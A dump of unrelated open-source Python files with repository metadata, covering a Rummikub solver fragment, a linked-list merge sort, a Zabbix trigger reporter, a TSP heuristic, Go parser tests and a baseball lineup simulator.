    deduplicated by symmetry, and handed to the c_rummikub extension for
    parallel evaluation on *cores* workers.  Progress, timings and the
    final result are printed; writeResult() persists a summary line.
    """
    # Initialize variables
    maxhand = stones * copies * colors
    to_remove = maxhand - hand
    start = default_timer()
    solutions = list()
    cR = c_rummikub.cRummikub(cores, stones, colors, copies)
    print("Initializing. n", stones, "k", colors, "m", copies, "c", cores, "h", hand)
    # Generating a starting table
    table = initTable(colors, stones, copies)
    table = list(chain(*table))
    init = default_timer()
    print("Initialized. Time taken:", round(init - start,2), "\nFinding subsets...")
    # Find unique subsets
    findSubsets(solutions, table, to_remove)
    subset = default_timer()
    print("Found", len(solutions), "possible subsets. Time taken:", round(subset - init,2), "\nRemoving duplicates...")
    # Removing duplicates
    solutions = removeDups(solutions)
    dups = default_timer()
    print(len(solutions), "possible subsets left. Time taken:", round(dups - subset,2), "\nExecuting...")
    # Execute the determined situations
    result = cR.delegate(solutions)
    execution = default_timer()
    print("Execution done. Time taken:", round(execution - dups,2))
    # Finalizing
    stop = default_timer()
    memory = memoryUsage()
    print(writeResult(hand, stones, colors, copies, cores, [result, round(stop - start,2), memory, "botup"]))
    print("Winning hands:", result)
if __name__ == '__main__':
    # Defaults used when no command-line arguments are supplied.
    stones = 6
    maxhand = 48
    minhand = 46#maxhand - 1
    cores = 7
    # Optional CLI override: maxhand minhand stones cores (all four or none).
    if len(argv) == 5:
        maxhand = int(argv[1])
        minhand = int(argv[2])
        stones = int(argv[3])
        cores = int(argv[4])
    elif len(argv)>1 and len(argv) != 5:
        print("Invalid amount of arguments. Must be either none or 4.")
        quit()
    # Evaluate hand sizes from largest to smallest.
    for hand in reversed(range(minhand, maxhand+1)):
        reverseCount(hand, stones, colors, copies, cores)
9ce59f2b5c89391bbcfcb365761ca4272f7e06bf | Python | ManasveeMittal/dropbox | /DataStructures/DataStructureAndAlgorithmicThinkingWithPython-master/chapter03linkedlists/LinkedListSortingWithMergeSort.py | UTF-8 | 2,102 | 3.234375 | 3 | [
"MIT"
] | permissive | # Copyright (c) Dec 22, 2014 CareerMonk Publications and others.
# E-Mail : info@careermonk.com
# Creation Date : 2014-01-10 06:15:46
# Last modification : 2008-10-31
# by : Narasimha Karumanchi
# Book Title : Data Structures And Algorithms Made In Java
# Warranty : This software is provided "as is" without any
# warranty; without even the implied warranty of
# merchantability or fitness for a particular purpose.
# Definition for singly-linked list.
class ListNode:
    """Singly linked list node holding a payload and a next pointer."""
    def __init__(self, x):
        self.data = x  # payload value
        self.next = None  # successor node, or None at the tail
class LinkedListSortWithMergeSort:
    """Sorts a singly linked list of ListNode in O(n log n) via merge sort.

    Node counts are passed explicitly down the recursion so no terminating
    scan or list splitting (next = None) is needed inside sort().
    """
    # @param head, a ListNode
    # @return a ListNode
    def sortList(self, head):
        """Return the head of the sorted list (None for an empty list)."""
        if head is None:
            return None
        # Count the nodes once so sort() can recurse on explicit sizes.
        counter = 0
        temp = head
        while temp is not None:
            temp = temp.next
            counter += 1
        return self.sort(head, counter)

    def sort(self, head, size):
        """Recursively sort the run of *size* nodes starting at *head*."""
        if size == 1:
            return head
        # Advance to the first node of the right half.
        list2 = head
        for i in range(0, size // 2):
            list2 = list2.next
        list1 = self.sort(head, size // 2)
        list2 = self.sort(list2, size - size // 2)
        return self.merge(list1, size // 2, list2, size - size // 2)

    def merge(self, list1, sizeList1, list2, sizeList2):
        """Merge two sorted runs of known sizes into one sorted list.

        Uses a dummy head; `tail` tracks the end of the merged list.
        (The local was named `list`, shadowing the builtin -- renamed.)
        """
        dummy = ListNode(0)
        tail = dummy
        pointer1 = 0
        pointer2 = 0
        while pointer1 < sizeList1 and pointer2 < sizeList2:
            if list1.data < list2.data:
                tail.next = list1
                list1 = list1.next
                pointer1 += 1
            else:
                tail.next = list2
                list2 = list2.next
                pointer2 += 1
            tail = tail.next
        # Append whichever run still has nodes left.
        while pointer1 < sizeList1:
            tail.next = list1
            list1 = list1.next
            pointer1 += 1
            tail = tail.next
        while pointer2 < sizeList2:
            tail.next = list2
            list2 = list2.next
            pointer2 += 1
            tail = tail.next
        # Detach the merged run from any trailing nodes of the source list.
        tail.next = None
        return dummy.next
| true |
f1ed75467fcd6744532075ac64870bcb3af090e6 | Python | KowsalyaS18/task2 | /listsum.py | UTF-8 | 187 | 3.296875 | 3 | [] | no_license | def my_func(list1):
print(sum(list1))
# Read `n` integers from stdin into list1, echo the list, then print its sum.
list1=[]
n=int(input("enter the list size"))
for i in range(0,n):
    item=int(input())
    list1.append(item)
print (list1)
my_func(list1)
| true |
43cd15729ac318c3300295b9486786a2e341c549 | Python | Kelly901/LenguajesFormales_T1 | /7Ejercicio.py | UTF-8 | 258 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | def is_leap(year):
leap = False
if year==1800 or year==1900 or year==2100 or year==2200 or year==2300 or year==2500:
return False
elif (year%4)==0 or year%400==0:
return True
return leap
# NOTE(review): raw_input() exists only in Python 2; under Python 3 this must be input().
year = int(raw_input()) | true |
0c6f12206efd92f62687ee656b03686bb8888c51 | Python | erik-stephens/xibbaz | /xibbaz/cmd/triggers.py | UTF-8 | 1,908 | 2.84375 | 3 | [
"MIT"
] | permissive | #! /usr/bin/env python3
"""
Report trigger status. Number of problems is exit code.
Usage: COMMAND [options] [<host>]
Arguments:
- host: zabbix hostname to report problems for. All hosts by default.
Options:
-v, --verbose
Report status of all checks, not just current problems, but only when a
host is given.
-p, --min-priority LEVEL
Report these triggers only: all, info, warn, avg, high, disaster [default: info]
--api URL
Zabbix API endpoint (defaults to ZABBIX_API from environment)
"""
from . import *
def description(trigger):
    """
    Substitute some important macros, namely `{HOST.NAME}`.
    """
    text = trigger.description.val
    hosts = trigger.hosts
    if hosts:
        # Join all host names into a single comma-separated string.
        host_names = ', '.join(host.text for host in hosts)
        text = text.replace('{HOST.NAME}', host_names)
    return text
def main(argv):
    """Report zabbix trigger status; exits with the number of problems found."""
    opts = docopt(__doc__, argv)
    hostname = opts.get('<host>')
    verbose = opts.get('--verbose')
    # Map the CLI priority name to zabbix's numeric priority scale.
    min_priority = dict(
        all = 0,
        info = 1,
        warn = 2,
        avg = 3,
        high = 4,
        disaster = 5,
    ).get(opts['--min-priority'])
    if min_priority is None:
        print('invalid --min-priority', file=sys.stderr)
        sys.exit(1)
    api = login(opts.get('--api'))
    params = dict()
    if hostname:
        # Restrict the query to a single host.
        host = api.host(hostname)
        params['hostids'] = [host.id]
    else:
        # All hosts: only active, monitored triggers currently in problem state.
        params['only_true'] = 1
        params['active'] = 1
        params['monitored'] = 1
    status = 0
    # Sort problems first, highest priority first.
    for t in sorted(api.triggers(**params), key = lambda i: (i.value.val, i.priority.val), reverse=True):
        if t.priority.val >= min_priority:
            problematic = t.value.val > 0
            if problematic:
                status += 1
            if verbose or problematic:
                print("{:8} {:12} {:25} {}".format(t.value, t.priority, t.hosts[0], description(t)))
    # Exit code doubles as the problem count (see module docstring).
    sys.exit(status)
if __name__ == '__main__':
    # Script entry point: forward CLI arguments (minus the program name).
    main(sys.argv[1:])
| true |
78d1f534be505b860dd5382aa1addb09859c8472 | Python | daniel-reich/ubiquitous-fiesta | /28mJ6NgqbQS4YRgDc_18.py | UTF-8 | 419 | 2.671875 | 3 | [] | no_license |
def can_pay_cost(mana_pool, cost):
    """Return True when `mana_pool` can pay `cost`.

    `cost` mixes digits (the generic mana amount) with letters (colored mana
    symbols). Every letter must be matched by the same letter in the pool;
    whatever remains in the pool must then cover the generic portion.
    """
    # Split the cost into its generic (numeric) and colored (letter) parts.
    generic = 0
    colored = []
    for symbol in cost:
        if symbol.isdigit():
            generic = generic * 10 + int(symbol)
        elif symbol.isalpha():
            colored.append(symbol)
    # Pay each colored symbol with a matching source from the pool.
    pool = list(mana_pool)
    for symbol in colored:
        if symbol in pool:
            pool.remove(symbol)
        else:
            return False  # no source of that color left
    # The leftover pool must be large enough to pay the generic cost.
    return len(pool) >= generic
| true |
a16dedf52a3f219cf5b01ff607f0bc343c1418c4 | Python | JuanOlivella/OlivellaJuan_S6C0LAB | /OlivellaJuan_plotsRK.py | UTF-8 | 427 | 3 | 3 | [] | no_license | import numpy as np
import matplotlib.pylab as plt
# Load the Runge-Kutta results; columns are x, y(x), and the error estimate.
datos1=np.genfromtxt("datosRK.dat")
x1 = datos1[:,0]
y1 = datos1[:,1]
error1 = datos1[:,2]
# Solution plot (titles/labels are user-facing Spanish text; left untouched).
plt.figure()
plt.plot(x1,y1)
plt.title("Solucion con el metodo de RK")
plt.xlabel("$x$")
plt.ylabel("$y(x)$")
plt.savefig("SolucionRK.pdf")
# Error plot.
plt.figure()
plt.plot(x1,error1)
plt.title("Error con el metodo de RK")
plt.xlabel("$x$")
plt.ylabel("$Error$")
plt.savefig("ErrorRK.pdf")
| true |
66af64d490fc055dac126515aa7e0f4e8ceda824 | Python | Aasthaengg/IBMdataset | /Python_codes/p03651/s782605497.py | UTF-8 | 257 | 2.8125 | 3 | [] | no_license | n,k,*a=map(int,open(0).read().split())
# NOTE(review): fractions.gcd was removed in Python 3.9; math.gcd is the
# modern replacement.
from fractions import gcd
# G = gcd of all pile heights; reachable heights are the multiples of G
# stepped down from each pile.
G=a[0]
for i in a:
    G=gcd(G,i)
A=max(a)
# k can never exceed the tallest pile.
if k>A:
    print("IMPOSSIBLE")
    exit()
# Step down from the maximum in multiples of G; k is reachable iff we hit it.
# (Equivalent to checking (A - k) % G == 0 in O(1).)
while A>0:
    if k==A:
        print("POSSIBLE")
        exit()
    A-=G
print("IMPOSSIBLE") | true |
0b70993d11f723d8fe5ad684689c4d6386bd41a8 | Python | janaleible/hotpotQA-ir-task | /services/run.py | UTF-8 | 2,744 | 2.75 | 3 | [] | no_license | import json
import sqlite3
from typing import Dict, List
from tqdm import tqdm
import main_constants as constants
from retrieval.term.dataset import Dataset
from services import helpers
class Run(dict):
    """A retrieval run: maps question id -> {document title -> score}."""

    def add_ranking(self, _id: str, ranking: Dict[str, float]) -> None:
        """Store (or overwrite) the complete ranking for one question."""
        self[_id] = ranking

    def update_ranking(self, question_id: str, document_title: str, score: float) -> None:
        """Add one document score; duplicate titles for a question are an error."""
        if question_id not in self:
            self[question_id] = {}
        # The -1 default doubles as the "not present" marker.
        assert self[question_id].get(document_title, -1) == -1, f'Ranking already ' \
            f'exists {question_id}.{document_title}={self[question_id][document_title]}'
        self[question_id][document_title] = score

    def update_rankings(self, rankings: Dict[str, Dict[str, float]]) -> None:
        """Bulk-merge rankings; existing questions are updated in place."""
        for _id in rankings.keys():
            if _id in self:
                self[_id].update(rankings[_id])
            else:
                self[_id] = rankings[_id]

    def write_to_file(self, path) -> None:
        """Serialize the run to `path` as JSON."""
        with open(path, 'w', encoding='utf-8') as file:
            json.dump(self, file)

    def to_json(self, db, dataset_path) -> List[dict]:
        """Build HotpotQA-format question dicts with the top-10 ranked
        documents of each question attached as context.

        Args:
            db: path to the sqlite database containing the `features` table.
            dataset_path: dataset file the questions are loaded from.
        """
        helpers.log('Creating hotpot data.')
        dataset = Dataset.from_file(dataset_path)
        questions = []
        # Load every document body once, indexed by title.
        connection = sqlite3.connect(db)
        cursor = connection.cursor()
        doc_results = cursor.execute(f"SELECT DISTINCT doc_title, document_text FROM features").fetchall()
        title2text = {json.loads(doc_title): json.loads(doc_text) for (doc_title, doc_text) in doc_results}
        cursor.close()
        connection.close()
        helpers.log('Loaded title2text.')
        for question_id, ranking in tqdm(self.items()):
            context = []
            sorted_by_score = sorted(ranking.items(), key=lambda value: value[1], reverse=True)
            # Keep only the 10 best-scored documents per question.
            for rank in range(min(10, len(ranking))):
                (title, score) = sorted_by_score[rank]
                doc_text = title2text[title]
                # Split stored text back into paragraphs, then sentences.
                article = [paragraph.split(constants.EOS.strip()) for paragraph in
                           doc_text.split(constants.EOP.strip())]
                article.insert(0, title)
                article.insert(1, score)
                context.append(article)
            full_question = dataset.find_by_id(question_id)
            question = {
                '_id': full_question.id,
                'level': full_question.level,
                'type': full_question.type,
                'question': full_question.question,
                'context': context,
                'answer': full_question.answer,
                'supporting_facts': full_question.supporting_facts
            }
            questions.append(question)
        return questions
| true |
43f7ab2db223256712ec02c9ba7a27b7e33ef5cc | Python | k018c1098/kadai | /kadai/kadai5-2.py | UTF-8 | 464 | 2.5625 | 3 | [] | no_license | import datetime
from flask import Flask, render_template, request
app = Flask(__name__)
# In-memory log of submissions. NOTE(review): this module-level list is shared
# by all clients and lost on restart; a persistent store would be safer.
a=[]

@app.route('/')
def index():
    """Show the input form."""
    return render_template('index6.html')

@app.route('/', methods=['POST'])
def index1():
    """Append a timestamped step-count entry and re-render the page."""
    b = datetime.datetime.now()
    # The format string includes user-facing Japanese text; do not modify it.
    b = b.strftime('%m/%d %H:%M 歩数 :')
    msg = request.form.get('msg')
    a.append( b + msg )
    return render_template('index6.html', c = a )

if __name__ == '__main__':
    app.debug = True
    app.run()
| true |
157144d524f82bc987543c551484dba7454608e7 | Python | Gangneng/edumeet | /djangoProject/edumeet/views.py | UTF-8 | 1,368 | 2.671875 | 3 | [] | no_license | from django.shortcuts import render
from datetime import datetime
import calendar
# https://blog.miguelgrinberg.com/post/video-streaming-with-flask/page/8
def main_cam(request):
    """Render the player page with a calendar grid for the current month.

    The template receives:
      - weakname: weekday headers, Sunday first
      - cal_Y / cal_M: current year and month as strings
      - bigcalendar: list of weeks; each week is 7 day numbers, with 0 for
        padding days that fall outside the month.
    """
    now = datetime.today()
    cal_Y = str(now.year)
    cal_M = str(now.month)
    weakname = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
    # calendar.Calendar.monthdayscalendar already produces Sunday-first weeks
    # padded with 0, replacing the manual weekday arithmetic. This also fixes
    # a bug in the original: its final-week padding appended len-1 zeros
    # instead of 7-len, so the last row could have the wrong width.
    bigcalendar = calendar.Calendar(firstweekday=6).monthdayscalendar(now.year, now.month)
    context = {
        "weakname": weakname,
        "cal_Y": cal_Y,
        "cal_M": cal_M,
        "bigcalendar": bigcalendar,
    }
    return render(request, "cam/player.html", context=context)
| true |
a8cde9391906519f134719ff5e2d0af9939f478a | Python | bridgesmith17/Algorithms_CS325 | /Project4/tsp.py | UTF-8 | 8,585 | 3.359375 | 3 | [] | no_license | #!/usr/bin/env python
from os import path
import time
import os
import sys
import math
import random
import copy
#function returns the rounded distace between two points.
def dist(pI, pII):
    """Euclidean distance between two (x, y) points, rounded to an int."""
    dx = pI[0] - pII[0]
    dy = pI[1] - pII[1]
    return int(round(math.sqrt(dx * dx + dy * dy)))
#helper function to pass coordinates inside array to dist function
def inDist(pI, pII):
    """Distance between two [name, (x, y)] city entries (unwraps the coords)."""
    coord_a = pI[1]
    coord_b = pII[1]
    return dist(coord_a, coord_b)
#greedy path, uses list in order given to find the next closest location and add to path
#based on :https://en.wikipedia.org/wiki/Nearest_neighbour_algorithm
def tspNN(pointsArray, start):
    """Nearest-neighbour tour construction.

    Starting from the city at index `start`, repeatedly travel to the closest
    unvisited city, then close the loop back to the start.

    Args:
        pointsArray: list of [name, (x, y)] entries. Bug fix: the original
            emptied this list while building the tour; the caller's list is
            now left intact.
        start: index of the starting city in pointsArray.

    Returns:
        (tour, total_distance): the visiting order as a new list and the tour
        length including the closing leg.
    """
    unvisited = list(pointsArray)  # work on a copy so the caller's list survives
    start_city = unvisited[start]
    tour = [start_city]
    unvisited.remove(start_city)
    travelDist = 0
    while unvisited:
        # `nearest` renamed from `next`, which shadowed the builtin.
        nearest = min(unvisited, key=lambda city: inDist(tour[-1], city))
        travelDist += inDist(tour[-1], nearest)
        tour.append(nearest)
        unvisited.remove(nearest)
    # Add the final leg from the last city back to the start.
    travelDist += inDist(tour[0], tour[-1])
    return tour, travelDist
#getDist loops though ordered array of tsp path to calcualted the total distance traveled
def getDist(pointsArray):
    """Total length of the closed tour given by the order of `pointsArray`."""
    total = 0
    # Sum consecutive legs, then add the closing leg back to the start.
    for prev_city, cur_city in zip(pointsArray, pointsArray[1:]):
        total += inDist(prev_city, cur_city)
    total += inDist(pointsArray[0], pointsArray[-1])
    return total
#two opt pulls checks and compares two the distance of two points and swaps if necessary to get the shortest path
#based on: https://en.wikipedia.org/wiki/2-opt, https://github.com/ntrifunovic/TSP/blob/master/tsp.py
def two_opt(pointsArray):
    """Single 2-opt improvement sweep: for each index pair (i, j), reverse the
    segment between them when reconnecting the two edges shortens the tour.

    Mutates pointsArray in place and returns (tour, total_distance).
    NOTE(review): this runs one sweep only, not until no improvement remains.
    """
    for i in range(len(pointsArray) - 1):
        for j in range(i + 2, len(pointsArray) - 1):
            # Compare current edges (i,i+1)+(j,j+1) against (i,j)+(i+1,j+1).
            if (inDist(pointsArray[i], pointsArray[i+1]) + inDist(pointsArray[j], pointsArray[j+1]) > inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i+1], pointsArray[j+1])):
                pointsArray[i+1:j+1] = reversed(pointsArray[i+1:j+1])
    dist = getDist(pointsArray)  # local name shadows the module-level dist()
    return pointsArray, dist
#three opt similar to 2-opt checks three distances at a time to find the shortest path
#based on: https://en.wikipedia.org/wiki/3-opt, https://github.com/ntrifunovic/TSP/blob/master/tsp.py
def three_opt(pointsArray):
    """Single 3-opt sweep: for every index triple (i, j, k), evaluate the seven
    possible reconnections of the three removed edges and apply the cheapest
    improving one. Returns (tour, total_distance).

    NOTE(review): cases 4-7 rebind the local `pointsArray`, so after the first
    such move the caller's original list object is no longer being mutated.
    """
    for i in range(len(pointsArray) - 1):
        for j in range(i + 2, len(pointsArray) - 1):
            for k in range(j + 2, len(pointsArray) - 1):
                way = 0  # which of the 7 reconnections wins (0 = keep as is)
                # Cost of the three edges currently in the tour.
                current = inDist(pointsArray[i], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[k + 1])
                if current > inDist(pointsArray[i], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1])
                    way = 1
                if current > inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[k + 1])
                    way = 2
                if current > inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1])
                    way = 3
                if current > inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1])
                    way = 4
                if current > inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1])
                    way = 5
                # NOTE(review): for way 6 the condition uses edge (j+1, i+1) but
                # the recomputed `current` uses (k, i+1) — looks inconsistent;
                # verify against the referenced 3-opt description.
                if current > inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[k], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1])
                    way = 6
                if current > inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1]):
                    current = inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1])
                    way = 7
                # Apply the winning reconnection via segment reversals/reorders.
                if way == 1:
                    pointsArray[j + 1: k + 1] = reversed(pointsArray[j + 1: k + 1])
                elif way == 2:
                    pointsArray[i + 1: j + 1] = reversed(pointsArray[i + 1: j + 1])
                elif way == 3:
                    pointsArray[i + 1: j + 1], pointsArray[j + 1: k + 1] = reversed(pointsArray[i + 1: j + 1]), reversed(pointsArray[j + 1: k + 1])
                elif way == 4:
                    pointsArray = pointsArray[: i + 1] + pointsArray[j + 1: k + 1] + pointsArray[i + 1: j + 1] + pointsArray[k + 1: ]
                elif way == 5:
                    temp = pointsArray[: i + 1] + pointsArray[j + 1: k + 1]
                    temp += reversed(pointsArray[i + 1: j + 1])
                    temp += pointsArray[k + 1: ]
                    pointsArray = temp
                elif way == 6:
                    temp = pointsArray[: i + 1]
                    temp += reversed(pointsArray[j + 1: k + 1])
                    temp += pointsArray[i + 1: j + 1]
                    temp += pointsArray[k + 1: ]
                    pointsArray = temp
                elif way == 7:
                    temp = pointsArray[: i + 1]
                    temp += reversed(pointsArray[j + 1: k + 1])
                    temp += reversed(pointsArray[i + 1: j + 1])
                    temp += pointsArray[k + 1: ]
                    pointsArray = temp
    dist = getDist(pointsArray)  # local name shadows the module-level dist()
    return pointsArray, dist
#uses tspNN function and adds a random start point to find the best path, varies number of random starts based on size of input to reduce time of operation
def randScale(pointsArray):
    """Nearest-neighbour with random restarts; keep the best tour found.

    The restart count shrinks as the instance grows, to bound run time.

    Returns:
        (best_tour, best_distance). Bug fixes: the original returned the tour
        of the *last* restart paired with the *best* distance, raised a
        NameError when no restart ran (single-city input), and left a debug
        print in the loop.
    """
    n = len(pointsArray) - 1
    # Fewer random restarts for larger instances.
    if n > 10000:
        restarts = 5
    elif n > 4000:
        restarts = 10
    elif n > 1000:
        restarts = 20
    elif n > 50:
        restarts = 50
    else:
        restarts = n
    if restarts == 0:
        # Degenerate instance: the input order is the only tour.
        return pointsArray, getDist(pointsArray)
    min_dist = float('inf')
    best_tour = pointsArray
    for _ in range(restarts):
        start_idx = random.randint(0, n)
        # Pass a copy so a mutating tspNN cannot consume the master list.
        tour, tour_dist = tspNN(list(pointsArray), start_idx)
        if tour_dist < min_dist:
            min_dist = tour_dist
            best_tour = tour
    return best_tour, min_dist
#main function reads input file with path, inserts into array and passes to tsp function. It then creats output file of best path found by algorithm
def main(importFile):
    """Solve the TSP instance in `importFile` and write `<importFile>.tour`.

    Input: one city per line as "<id> <x> <y>".
    Output file: first line is the total tour distance, then one city id per
    line in visiting order. Does nothing if the input file does not exist.
    """
    if not path.isfile(importFile):
        return
    # Parse the instance into [name, [x, y]] entries.
    tspArray = []
    with open(importFile, 'r') as testFile:  # with-block closes the file even on errors
        for line in testFile:
            fields = line.split()  # split() also discards trailing \n / \r
            tspArray.append([fields[0], [int(fields[1]), int(fields[2])]])
    # Time and run the solver.
    start = time.time()
    tspF, distance = randScale(tspArray)
    print(time.time() - start)
    # Write the result next to the input file (removed the unused `splt` local).
    outFile = importFile + ".tour"
    if path.isfile(outFile):
        os.remove(outFile)
    with open(outFile, 'w') as NewFile:
        NewFile.write("%d\n" % distance)
        for entry in tspF:
            NewFile.write("%s\n" % entry[0])
# CLI entry point: expect exactly one argument, the input file path.
args = len(sys.argv)
if args <= 1 or args > 2:
    print("Usage: tsp.py <inputfile>")
else:
    main(str(sys.argv[1]))
| true |
83d7f232a388bb831f29b57138c9169c40857a25 | Python | excitoon-favorites/lizard | /test/test_languages/testGo.py | UTF-8 | 2,340 | 2.78125 | 3 | [
"MIT"
] | permissive | import unittest
import inspect
from lizard import analyze_file, FileAnalyzer, get_extensions
def get_go_function_list(source_code):
    """Parse `source_code` as a Go file and return lizard's function list."""
    file_info = analyze_file.analyze_source_code("a.go", source_code)
    return file_info.function_list
class Test_parser_for_Go(unittest.TestCase):
    """Checks that lizard's Go reader counts functions, parameters and
    cyclomatic complexity, and ignores non-function constructs."""

    def test_empty(self):
        functions = get_go_function_list("")
        self.assertEqual(0, len(functions))

    def test_no_function(self):
        # A bare loop is not a function definition.
        result = get_go_function_list('''
for name in names {
print("Hello, \(name)!")
}
''')
        self.assertEqual(0, len(result))

    def test_one_function(self):
        result = get_go_function_list('''
func sayGoodbye() { }
''')
        self.assertEqual(1, len(result))
        self.assertEqual("sayGoodbye", result[0].name)
        self.assertEqual(0, result[0].parameter_count)
        self.assertEqual(1, result[0].cyclomatic_complexity)

    def test_one_with_parameter(self):
        result = get_go_function_list('''
func sayGoodbye(personName string, alreadyGreeted chan bool) { }
''')
        self.assertEqual(1, len(result))
        self.assertEqual("sayGoodbye", result[0].name)
        self.assertEqual(2, result[0].parameter_count)

    def test_one_function_with_return_value(self):
        result = get_go_function_list('''
func sayGoodbye() string { }
''')
        self.assertEqual(1, len(result))
        self.assertEqual("sayGoodbye", result[0].name)

    def test_one_function_with_complexity(self):
        # One `if` adds one to the base complexity of 1.
        result = get_go_function_list('''
func sayGoodbye() { if ++diceRoll == 7 { diceRoll = 1 }}
''')
        self.assertEqual(2, result[0].cyclomatic_complexity)

    def test_interface(self):
        # Interface method signatures must not be counted as functions.
        result = get_go_function_list('''
type geometry interface{
area() float64
perim() float64
}
func sayGoodbye() { }
''')
        self.assertEqual(1, len(result))
        self.assertEqual("sayGoodbye", result[0].name)

    def test_interface_followed_by_a_class(self):
        result = get_go_function_list('''
type geometry interface{
area() float64
perim() float64
}
class c { }
''')
        self.assertEqual(0, len(result))
| true |
92c99985f5db11082a1c5a366f0b90e6ced4451e | Python | wow-kim/Algorithm | /Programmers/2단계_점프와_순간_이동.py | UTF-8 | 215 | 2.953125 | 3 | [] | no_license | def solution(n):
count = 0
while(n>0):
d,m = divmod(n,2)
if m == 1 : count += 1
n = d
return count
#-------------------------------
def solution(n):
    """Minimum battery usage: the number of 1s in n's binary representation."""
    binary_digits = format(n, 'b')
    return binary_digits.count('1')
e7d1298713f5496b24944b4a66b012de2f4e543e | Python | spacewander/AlgorithmAndDataStructure | /python/test_numeric.py | UTF-8 | 492 | 2.96875 | 3 | [] | no_license | import pytest
import numeric as n
@pytest.fixture
def ary():
    """Shared three-element sample list."""
    return [1, 2, 3]

def test_itoa():
    # NOTE(review): generator.next() is Python 2 syntax; Python 3 uses next(g).
    g = n.itoa(1)
    assert 1 == g.next()
    assert 2 == g.next()

def test_accumulate(ary):
    # Fold with multiplication: 1 * 1 * 2 * 3 == 6.
    assert n.accumulate(ary, 1, lambda x, y : x * y) == 6

def test_inner_product(ary):
    # 1*1 + 2*2 + 3*3 + 0 == 14.
    assert n.inner_production(ary, ary, 0) == 14

def test_adjacent_difference(ary):
    assert n.adjacent_difference(ary) == [1, 1, 1]

def test_partial_sum(ary):
    assert n.partial_sum(ary) == [1, 3, 6]
| true |
70c595b53321f19e237841a506ef062ad045ac60 | Python | jimmycfa/baseball_simulation | /Baseball_Lineup.py | UTF-8 | 15,201 | 3.09375 | 3 | [] | no_license |
# coding: utf-8
# For little leage with max run limits per inning, the normal baseball lineup strategies don't work
# This is an attempt to figure out the best lineup given on base percentages for the kids
# 'll be the first to admit they are kids and they should be having fun which, is why no kids contributed to the making of this
# #analysis. But I'm their coach and I like learning new tools so it was a nice intersection of the two interests.
#
# 10 Permute 10 is 3,628,800. One option would be to Monte Carlo all 3.629 million possibilities for lineup
# The other is using a Genetic Algorithm...
# If we think of bases and whether someone is on it as states we have the following 8 possibilities.
# b1 b2 b3
# 0 0 0 --> empty bases
# 1 0 0 --> someone on first
# 0 1 0
# 1 1 0
# 0 0 1
# 1 0 1
# 0 1 1
# 1 1 1
#
# If the current state is 000 and someone hits a single then it would transition to 001. Runs occur on certain state transitions. If we have 001 and someone hits a single then the states would go to 100 and the number of runs would increment.
# In[28]:
import numpy as np
import pandas as pd
from enum import Enum
#import simpy
from copy import deepcopy
# In[29]:
#In Coach pitch At Bats (AB) is the same as Plate Apperances (PA) since there are no walks, hit by pitch, etc.
class Player:
    """A batter described by the probabilities of each plate-appearance outcome.

    Outcomes: single (p1b), double (p2b), triple (p3b), home run (phr),
    strike out (pso), and hit-but-thrown-out-at-first (pbo). The six
    probabilities must sum to 1.
    """

    # Class-level defaults; every instance overwrites them in __init__.
    p1b = 1.0
    p2b = 1.0
    p3b = 0.0
    phr = 0.0
    pso = 0.0  # struck out
    pbo = 0.0  # hit but thrown out at first (useful for advancing a runner)

    def __init__(self, hit_probs):
        """hit_probs: the six outcome probabilities in the order documented above."""
        self.p1b, self.p2b, self.p3b, self.phr, self.pso, self.pbo = hit_probs
        total = self.p1b + self.p2b + self.p3b + self.phr + self.pso + self.pbo
        # Bug fix: compare with a tolerance instead of exact float equality,
        # so sets like [0.5, 0.2, 0.1, 0.1, 0.05, 0.05] are not falsely
        # rejected by floating-point rounding.
        if abs(total - 1.0) > 1e-9:
            print("Error with setting player")
            print(hit_probs)
            print(total)
        self.hit_probs = [self.p1b, self.p2b, self.p3b, self.phr, self.pso, self.pbo]

    def get_hit(self):
        """Draw one plate-appearance outcome.

        Returns a length-1 numpy array such as array(['p1b']); callers compare
        it against strings element-wise.
        """
        return np.random.choice(['p1b', 'p2b', 'p3b', 'phr', 'pso', 'pbo'], 1,
                                p=self.hit_probs)
# In[44]:
# Per-inning results table used by the (commented-out) Monte Carlo simulation.
df = pd.DataFrame(data = [], columns = ['Inning', 'Runs', 'Outs', 'Inning Runs'])
OUTS = 3  # outs that end a half-inning
MAX_RUNS = 5  # little-league cap on runs per inning
MAX_INNINGS = 4  # innings per simulated game
